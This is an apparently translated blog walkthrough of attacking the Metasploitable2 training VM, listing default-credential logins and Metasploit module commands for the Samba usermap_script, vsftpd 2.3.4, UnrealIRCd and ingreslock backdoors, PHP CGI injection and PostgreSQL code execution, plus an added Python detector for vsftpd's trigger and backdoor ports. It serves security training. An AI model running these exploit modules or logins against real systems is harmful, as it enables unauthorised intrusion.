Metasploitabile2 target learning
2022-06-11 06:17:00 [H-feng]
What is Metasploitable2?
Metasploitable2 is a purpose-built Ubuntu virtual machine designed as a security training target for testing and demonstrating common vulnerabilities.
Usage steps
Download address: https://sourceforge.net/projects/metasploitable/files/latest/download
The default username and password are both msfadmin.
Double-click the downloaded virtual machine to open it.

The network adapter is in NAT mode by default (NAT uses the same network segment as the host's Wi-Fi; a Kali VM on the same network segment can also ping the target).
Target vulnerabilities
Before testing the vulnerabilities, you can first scan the target's ports.
The target IP is 192.168.126.148
The Kali IP is 192.168.126.130
1. Weak password vulnerabilities
System weak password
telnet 192.168.126.148
Account and password: msfadmin
MySQL weak password
Run mysql -h 192.168.126.148 -u root and the login succeeds directly.
PostgreSQL weak password
Run psql -h 192.168.126.147 -U postgres
Password: postgres, login succeeds.
VNC remote login weak password
Run vncviewer 192.168.126.148
Password: password, logs in directly.
2. Samba MS-RPC shell command injection vulnerability
Cause of the vulnerability: unfiltered user input supplied via MS-RPC is passed to /bin/sh when the external script defined in smb.conf is invoked, which allows remote command execution.
Step 1: start msfconsole on Kali

Step 2: search for the matching Samba exploit module: search samba

Step 3: use exploit/multi/samba/usermap_script
use exploit/multi/samba/usermap_script
Step 4: set the parameters
set rhosts 192.168.126.148
Step 5: run the exploit and list the directory
run
ls
3. Vsftpd source-code backdoor vulnerability
Cause of the vulnerability: in a particular version of the vsftpd server program, someone maliciously planted code so that when the user name ends in ":)", the server starts listening on port 6200 and arbitrary code can be executed.
Step 1: start msfconsole on Kali

Step 2: search for vsftpd-related vulnerability modules
search vsftpd
Step 3: use exploit/unix/ftp/vsftpd_234_backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
Step 4: set the parameters
set rhosts 192.168.126.148
Step 5: run the exploit

4. UnrealIRCd backdoor vulnerability
Cause of the vulnerability: between November 2009 and June 2010, the UnrealIRCd distributed on some mirror sites contained externally introduced malicious code in the DEBUG3_DOLOG_SYSTEM macro, allowing remote attackers to execute arbitrary code.
Steps 1 and 2 from the previous sections (starting msfconsole and searching for the module) are not shown as screenshots.
Step 1: find the corresponding module and use it

Step 2: set the corresponding parameters

Step 3: run the exploit

5. PHP CGI argument injection execution vulnerability
Vulnerability description: the CGI script does not handle request parameters correctly, which leads to source code disclosure and allows remote attackers to insert commands to be executed via the request parameters.
Step 1: find the corresponding module and use it

Step 2: set the corresponding parameters

Step 3: run the exploit

6. Ingreslock backdoor vulnerability
Vulnerability description: the Ingreslock backdoor listens on port 1524; connecting to port 1524 gives root privileges directly.
Step 1: run the telnet command

Step 2: the login succeeds directly; check the privileges
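As an added example (not part of the original post), here is a defender-side check for two of the backdoors described above: it flags vsftpd login attempts whose user name ends in the ":)" trigger, and it flags listeners on the backdoor ports 6200 (vsftpd 2.3.4) and 1524 (ingreslock) in `ss -ltn` output. The log lines and the socket listing are constructed samples in an assumed vsftpd-style and ss-style format.

```python
import re
from typing import Dict, List

# Trigger described on the page: a user name ending in ":)" makes the
# backdoored vsftpd 2.3.4 open a listener on TCP 6200.
VSFTPD_TRIGGER = ":)"

# Backdoor listener ports named on the page.
BACKDOOR_PORTS = {6200: "vsftpd 2.3.4 backdoor shell",
                  1524: "ingreslock backdoor shell"}

# Assumed vsftpd-style auth log line, e.g.
#   Sat Jun 11 06:17:02 2022 [pid 2030] [msfadmin] OK LOGIN: Client "192.168.126.130"
LOGIN_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"')

# Assumed `ss -ltn` row: State Recv-Q Send-Q Local:Port Peer:Port
LISTEN_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s", re.M)


def find_backdoor_triggers(log_lines: List[str]) -> List[Dict[str, str]]:
    """Return login attempts whose user name ends in the vsftpd backdoor trigger."""
    hits = []
    for line in log_lines:
        m = LOGIN_RE.search(line)
        if m and m.group("user").endswith(VSFTPD_TRIGGER):
            hits.append({"user": m.group("user"), "result": m.group("result"),
                         "client": m.group("client")})
    return hits


def find_backdoor_listeners(ss_output: str) -> Dict[int, str]:
    """Map listening ports that match known backdoor ports to a description."""
    return {int(m.group("port")): BACKDOOR_PORTS[int(m.group("port"))]
            for m in LISTEN_RE.finditer(ss_output)
            if int(m.group("port")) in BACKDOOR_PORTS}


# Constructed sample data (not captured from a real system).
SAMPLE_LOG = [
    'Sat Jun 11 06:17:01 2022 [pid 2031] CONNECT: Client "192.168.126.130"',
    'Sat Jun 11 06:17:02 2022 [pid 2030] [msfadmin] OK LOGIN: Client "192.168.126.130"',
    'Sat Jun 11 06:18:10 2022 [pid 2040] CONNECT: Client "192.168.126.130"',
    'Sat Jun 11 06:18:11 2022 [pid 2039] [test:)] FAIL LOGIN: Client "192.168.126.130"',
]
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:21        0.0.0.0:*
LISTEN 0      5      0.0.0.0:6200      0.0.0.0:*
LISTEN 0      5      0.0.0.0:1524      0.0.0.0:*
"""

if __name__ == "__main__":
    print("trigger attempts:", find_backdoor_triggers(SAMPLE_LOG))
    print("backdoor listeners:", find_backdoor_listeners(SAMPLE_SS))
```

A trigger hit followed by a new listener on 6200 on the same host is the combination worth alerting on; either signal alone is still worth a look.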

7. PostgreSQL arbitrary shared library code execution
Vulnerability description: in some default Linux installations of PostgreSQL, the postgres service account can write to the /tmp directory and load shared libraries, allowing arbitrary code execution.
Step 1: find the corresponding module and use it

Step 2: set the corresponding parameters

Step 3: run the exploit

Summary: the target contains other vulnerabilities as well; refer to the write-ups compiled by other experts.